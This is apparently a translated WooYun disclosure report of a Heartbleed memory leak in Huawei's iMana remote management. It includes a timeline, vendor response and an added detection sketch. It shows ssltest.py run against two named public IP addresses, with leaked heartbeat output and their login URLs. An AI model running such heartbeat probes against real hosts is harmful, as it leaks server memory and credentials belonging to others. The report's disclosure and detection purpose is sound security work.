
Vulnerability summary

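Bug ID: wooyun-2015-0106564

Title: Information disclosure vulnerability in Huawei server remote management iMana

Vendor: Huawei Technologies Co., Ltd.

Author: 路人甲

Submitted: 2015-04-09 18:26

Fixed: 2015-05-29 10:58

Publicly disclosed: 2015-05-29 10:58

Vulnerability type: Disclosure of important sensitive information

Severity: High

Self-assessed Rank: 10

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]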



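Vulnerability details

Disclosure status:

2015-04-09: Details reported to the vendor; awaiting vendor handling
2015-04-14: Vendor confirmed; details disclosed to the vendor only
2015-04-24: Details disclosed to core white hats and experts in related fields
2015-05-04: Details disclosed to regular white hats
2015-05-14: Details disclosed to trainee white hats
2015-05-29: Details disclosed to the public

Brief description:

Huawei server remote management iMana has an information disclosure vulnerability.

Detailed description:

Huawei server remote management iMana has an openssl vulnerability.
Test 1: 101.226.247.236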

ssltest.py 101.226.247.236|more
Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 1961
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 12307
Received heartbeat response:


Test 2: 101.226.247.237

Connecting...
Sending Client Hello...
Waiting for Server Hello...
... received message: type = 22, ver = 0302, length = 58
... received message: type = 22, ver = 0302, length = 1961
... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
... received message: type = 24, ver = 0302, length = 12307
Received heartbeat response:

Proof of vulnerability:

https://101.226.247.236/login.asp
https://101.226.247.237/login.asp

Remediation:

Upgrade openssl
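
The decisive line in both test outputs is a heartbeat record (type = 24) of 12307 bytes coming back from the server. As an added example (not part of the original report or of ssltest.py), the sketch below flags that pattern in captured TLS byte streams by comparing heartbeat record sizes per direction; the sample streams, the `slack` threshold and all function names are constructed for illustration.

```python
import struct

HANDSHAKE, HEARTBEAT = 22, 24   # TLS record content types; 24 is heartbeat (RFC 6520)

def tls_records(stream: bytes):
    """Yield (content_type, version, body_length) for each complete TLS record."""
    pos = 0
    while pos + 5 <= len(stream):
        # Record header: 1-byte type, 2-byte version, 2-byte length (big endian).
        ctype, version, length = struct.unpack_from("!BHH", stream, pos)
        if pos + 5 + length > len(stream):   # truncated capture: stop parsing
            return
        yield ctype, version, length
        pos += 5 + length

def oversized_heartbeats(client: bytes, server: bytes, slack: int = 32):
    """Pair heartbeat records in order and return (request_len, response_len)
    for every response that exceeds its request by more than `slack` bytes.

    A conforming peer echoes the request payload and adds its own padding, so
    the two records are close in size. `slack` is an assumed tolerance for that
    padding difference. Only record headers are read, so the check also works
    once the records are encrypted.
    """
    sent = [n for t, _, n in tls_records(client) if t == HEARTBEAT]
    got = [n for t, _, n in tls_records(server) if t == HEARTBEAT]
    return [(rq, rs) for rq, rs in zip(sent, got) if rs > rq + slack]

def record(ctype: int, body: bytes, version: int = 0x0302) -> bytes:
    """Build one TLS record; used only to construct the sample streams below."""
    return struct.pack("!BHH", ctype, version, len(body)) + body

# Constructed sample streams with zero-filled bodies. The record sizes mirror
# the tool output above (ver = 0302, a 12307-byte heartbeat response), followed
# by one well-behaved exchange for contrast.
CLIENT = (record(HANDSHAKE, bytes(58)) + record(HEARTBEAT, bytes(3))
          + record(HEARTBEAT, bytes(35)))
SERVER = (record(HANDSHAKE, bytes(58)) + record(HEARTBEAT, bytes(12307))
          + record(HEARTBEAT, bytes(35)))

if __name__ == "__main__":
    for rq, rs in oversized_heartbeats(CLIENT, SERVER):
        print(f"heartbeat response of {rs} bytes for a {rq}-byte request")
```

Hits on a management interface such as this one mean that credentials and session cookies handled by the device should be treated as exposed and rotated after the openssl upgrade.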

Copyright notice: when reposting, please credit the source 路人甲@乌云


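Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 5

Confirmed: 2015-04-14 10:56

Vendor reply:

Thanks for the reminder.

Latest status:

2015-04-14: Thank you to the white hat for the attention paid to the security of Huawei products. Huawei fixed this vulnerability in May 2014 and published an SA on the Huawei PSIRT website. The servers exploited in the report are running a historical version; we have notified the customer to handle it.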